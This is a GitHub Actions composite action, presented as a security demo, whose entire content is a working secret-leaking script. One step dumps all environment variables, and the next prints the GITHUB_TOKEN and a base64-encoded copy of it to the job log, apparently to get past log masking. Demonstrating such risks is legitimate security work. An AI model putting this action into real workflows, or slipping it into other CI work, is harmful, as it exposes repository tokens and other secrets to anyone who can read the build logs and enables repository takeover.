name: "Secret Exfiltration Action"
description: "A reusable action to demonstrate secret exfiltration risks."
author: "Security Demo"
runs:
  using: "composite"
  steps:
    - name: 🔍 Debugging Environment Variables
      run: |
        echo "🔄 Listing Environment Variables:"
        env  # This will print all available environment variables
      shell: bash

    - name: 🔥 Extract and Exfiltrate Secrets
      run: |
        echo "🔓 Extracting GitHub Token..."
        echo "GITHUB_TOKEN is: ${GITHUB_TOKEN}"  # Print token if available
        echo "Base64 Encoded GITHUB_TOKEN: $(echo ${GITHUB_TOKEN} | base64)"
      shell: bash
